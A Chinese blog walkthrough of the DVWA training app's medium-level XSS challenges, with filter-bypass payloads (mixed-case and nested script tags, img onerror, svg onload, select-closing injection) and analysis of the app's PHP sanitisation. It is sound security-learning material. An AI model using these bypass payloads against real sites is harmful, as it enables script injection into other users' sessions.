【DVWA】XSS-----------------(Medium)

最新推荐文章于 2024-05-11 02:28:00 发布
最新推荐文章于 2024-05-11 02:28:00 发布
阅读量198 收藏 1
点赞数
分类专栏: xss 文章标签: xss web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43665434/article/details/113902205
版权

【DVWA】XSS-----------------(Medium)

1、Reflected

输入<script>alert(/xss/)</script>

查看网页源码

image-20210219220822491

发现过滤了<script>,不慌不慌。。

尝试绕过: 大小写混合<ScRiPt>alert(/xss/)</script>

拼凑:<scr<script>ipt>alert(/xss/)</script>

img标签:<img src=1 onerror=alert(/xss/) />

svg标签:<svg onload=alert(1)>

均可绕过

image-20210219220925082

源码分析

image-20210219223832953

2、DOM

查看网页源码

image-20210219233412393

构造闭合</select><svg onload=alert(1)>

</select><img src=1 onerror=alert(/xss/)>

</select><a href=javascript:alert(/xss/)> (需要手动点击)

均可绕过:

image-20210219234624363

源码分析

image-20210219230716890

如图所示,若参数中有<script,页面即可被重定向到English页面,而且stripos()匹配不区分大小写,所以换用其他标签即可绕过。

3、Stored

测试流程

输入<script>alert(/xss/)</script>

查看网页源码

image-20210219235224068

发现<script>被过滤了。

尝试大小写混合绕过:

<sCrIpT>alert(/xss/)</script>

image-20210219235424546

成功绕过!其他标签也可以,方法多样。

源码分析

<?php
if( isset( $_POST[ 'btnSign' ] ) ) {
    // Get input
    $message = trim( $_POST[ 'mtxMessage' ] );  //trim去除开头结尾空格和其他预定义字符(不涉及测试的敏感字符)
    $name    = trim( $_POST[ 'txtName' ] );

    // Sanitize message input 这个部分过滤比较严格,很难绕过
    $message = strip_tags( addslashes( $message ) );
    $message = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $message ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));
    $message = htmlspecialchars( $message );

    // Sanitize name input 这个部分只过滤了<script>,比较好绕过
    $name = str_replace( '<script>', '', $name );
    $name = ((isset($GLOBALS["___mysqli_ston"]) && is_object($GLOBALS["___mysqli_ston"])) ? mysqli_real_escape_string($GLOBALS["___mysqli_ston"],  $name ) : ((trigger_error("[MySQLConverterToo] Fix the mysql_escape_string() call! This code does not work.", E_USER_ERROR)) ? "" : ""));

    // Update database
    $query  = "INSERT INTO guestbook ( comment, name ) VALUES ( '$message', '$name' );";
    $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );

    //mysql_close();
}

?>

  • trim() 函数 去除开头结尾空格和其他预定义字符

    image-20210220000231277

  • strip_tags()函数 剥去html, xml, php标签(很难绕过)

    image-20210220000636372

    例子:

    image-20210220000720137

  • addslashes()函数 转义字符串

    在预定义的字符前添加反斜杠

    image-20210220001116778

  • is_object()函数

    用于检测变量是否是一个对象

  • mysqli_real_escape_string() 函数

    用于转义字符串中的特殊字符(不包括测试的敏感字符)

    image-20210220125155984

    trigger_error()函数 函数创建用户自定义的错误消息。

    image-20210220225507850

总结:

dvwa的中级相对于低级来说还是添加了一些过滤的,基本都是对`<script>`标签的过滤
有的区分大小写,直接大小写混合就绕过了,不过stripos()是不区分大小写的,但用其他标签也可绕过。
存储型中的内容输入框过滤比较严格strip_tags()去除html,xml,php标签,绕过比较难。
0ak1ey
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
DVWA - XSS DOM (medium)
qq_42630215的博客
06-04 507
随便在选项里选一个,url中会出现我们选的哪个。 看看可不可以用<script>alert(document.cookie)</script> 127.0.0.1/DVWA-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie)</script> 发现不会执行,而且语句也没有在url中显示,只显示English应该是过滤了方法一 换一个试一下<img src=1 one
DVWA-master.zip
09-16
2. 启动服务:运行DVWA,访问默认的登录页面,了解每个安全级别(Low, Medium, High, Impossible)的设置。 3. 分析漏洞:逐个挑战每个漏洞,了解其原理,尝试构造攻击payload。 4. 使用工具:配合Burp Suite、...
XSS攻击-DVWAMedium
天威一号
11-21 312
士大夫VS的
2024年最全DVWA-XSS(DOM)Low Medium High低中高级别_就tm你叫韩毅啊,2024年最新作为一名网络安全面试者你应该知道的
最新发布
2401_84281748的博客
05-11 897
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DVWA - XSS Reflected(medium)
qq_42630215的博客
06-09 232
输入常规的payload <script>alert(document.cookie)</script> script标签应该是被过滤了 方法一 大写绕过 <SCRIPT>alert(document.cookie)</SCRIPT> 执行成功 方法二 双写绕过 <sc<script>ript>alert('xss')</script> 方法三 其他标签 在这里插入代码片 img标签: <img src=1
DVWA - XSS (Reflected) (low, medium, high)
无节操
01-06 1750
low无验证,直接注入<script>alert(document.cookie)</script>medium查看源码发现过滤了<scrpit>标签$name = str_replace( '<script>', '', $_GET[ 'name' ] ); 绕过思路:大写<Script>alert(document.cookie)</script>high查看源码,可发现用正则过滤了$name
DVWA中(medium)、高(high)级别xss
白帽小学二年级的博客
12-23 984
DVWA中(medium)、高(high)级别xss
DVWA-master
12-10
6. **安全级别设置**:DVWA的每个漏洞场景都有不同的难度级别,从低到高分别为“Low”、“Medium”、“High”、“ Impossible”,用户可以根据自己的水平选择合适的挑战。 通过参与"DVWA-master"的学习和实践,不仅...
DVWA靶场的安装-超详细
05-29
DVWA提供了多个安全级别,从低到高分别是"Easy"、"Medium"、"Hard"和"Impossible"。在DVWA首页,你可以选择不同的安全级别来调整漏洞的难度。 ### 开始学习与实践 现在,你已经成功安装了DVWA靶场。你可以尝试进行...
刷题之旅第7站,DVWA XSS reflect (low,medium,high)
cc菜的一批
01-21 330
一、什么是XSS reflect XSS反射型攻击,恶意代码并没有保存在目标网站,通过引诱用户点击一个链接到目标网站的恶意链接来实施攻击的。 二、DVWA 实战 1、low难度 没有进行任何过滤,那么直接写js代码 <script>alert('hack')</script> 2、medium 难度 直接输入 被过滤掉了。 使用大小写即可绕过, <sCript...
DVWA靶场-中级难度
ljlrookiebird的博客
07-31 996
网络安全 - DVWA靶场
DVWA靶场存储型XSS漏洞实验
weixin_44851588的博客
05-26 4591
提示:文章写完后,目录可以自动生成,如何生成可参考右边的帮助文档 文章目录 前言 一、pandas是什么? 二、使用步骤 1.引入库 2.读入数据 总结 前言 来自菜鸟的一次简单分享,本次实验主要结合后台源代码讲解,梳理存储型XSS实验的思路,如果存在问题,请各位大佬多多指导。 一、XSS基础 1.什么是XSS? XSS(Cross-site scripting)被称为跨站脚本攻击,由于与层叠样式表的缩写一样,因此被缩写为XSS。 2.XSS漏洞...
DVWA-XSS (Reflected)-反射型XSS
seanyang_的博客
06-12 3050
XSS攻击,是指攻击者在Web页面中输入恶意的JavaScript脚本,而Web应用程序没有对用户的输入进行过滤或处理就直接执行,将结果输出在网页中。如果恶意JavaScript脚本被存储到后端服务器中,用户打开该Web页面时,恶意脚本则可能在浏览器中自动执行。XSS攻击依赖于JavaScript脚本的执行。一般,攻击者插入恶意脚本后,需要将脚本执行结果显示出来,因此,XSS攻击常见于网站中有用户输入且能够显示的地方,如文章发表、评论回复、留言板等。
DVWA把玩:存储型XSS
weixin_43466027的博客
04-16 279
XSS(跨站点脚本)是一种注入攻击。恶意脚本被注入到正常的网站中。 当攻击者使用Web应用程序将恶意代码(通常以浏览器脚本的形式)发送给其他最终用户时,就会发生XSS攻击。一般来说这种攻击发生的原因是没有对用户提交的输入进行过滤。 XSS一般分为反射型和存储型。下面我们会用具体的例子来说明: 0x01 存储型XSS 看一下靶场页面。我们的任务是通过下面的两个文本框做做弹窗——能弹窗就约等于能想干嘛干嘛了。 看一下网页源码,我们发现提交的内容会被一纯文本的形式放在网页上: low难度 low难度的话,我们可
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 520
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
DVWA-XSS(DOM)Low Medium High低中高级别_就tm你叫韩毅啊
2401_84023579的博客
04-11 973
总之啊,家里没矿的同学们,如果你们想以后的日子过得好一些,多想想你们的业余时间怎么安排吧;技术方面的提升肯定是重中之重,但是技术外的一些“软实力”也不能完全忽视,很多时候升职确实是因为你的技术足够强,但也与你的“软实力”密切相关在这我也分享一份大佬自己收录整理的Android学习PDF+架构视频+面试文档+源码笔记,还有高级架构技术进阶脑图、Android开发面试专题资料,高级进阶架构资料这些都是我闲暇还会反复翻阅并给下属员工学习的精品资料。
DVWA靶场中的xss-反射型xss、存储型xss的low、medium、high的详细通关方法
qq_59020256的博客
12-27 1330
alert(1)尝试闭合,输入">alert(1)输入">alert(1)输入">alert(1)输入alert(1)输入alert(1)输入alert(1)输入alert(1)
如何才能成为一名优秀的网络安全工程师?_如何成为一个网络安全工程师(1)
2401_84247617的博客
05-08 839
在结束之际,我想重申的是,学习并非如攀登险峻高峰,而是如滴水穿石般的持久累积。尤其当我们步入工作岗位之后,持之以恒的学习变得愈发不易,如同在茫茫大海中独自划舟,稍有松懈便可能被巨浪吞噬。然而,对于我们程序员而言,学习是生存之本,是我们在激烈市场竞争中立于不败之地的关键。一旦停止学习,我们便如同逆水行舟,不进则退,终将被时代的洪流所淘汰。因此,不断汲取新知识,不仅是对自己的提升,更是对自己的一份珍贵投资。让我们不断磨砺自己,与时代共同进步,书写属于我们的辉煌篇章。需要完整版PDF学习资源私我。
DVWA--存储型XSS(初中高)
firecjh的博客
06-09 530
选择“View Source”查看源程序,发现服务器端对message框内容使用了htmlspecialchars() 函数进行转义,对name框使用str_replace()函数进行替换。选择“View Source”查看源程序,对message参数进行html转义外,还对name参数使用preg_replace()函数进行替换,不能使用常用的绕过方法。2)在界面出现弹框,弹框内容为本人姓名拼音。2)在界面出现弹框,弹框内容为本人姓名拼音。3) 刷新页面,查看是否再次出现弹框,比较与反射型XSS的区别。
DVWA-XSS(DOM)
08-25
DVWA-XSS(DOM)是指DVWA靶机学习中的一种XSS攻击,它利用了DOM(文档对象模型)中的漏洞。DOM是一个与平台、编程语言无关的接口,允许程序或脚本动态地访问和更新文档内容、结构和样式。而DVWA-XSS(DOM)攻击则是通过...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值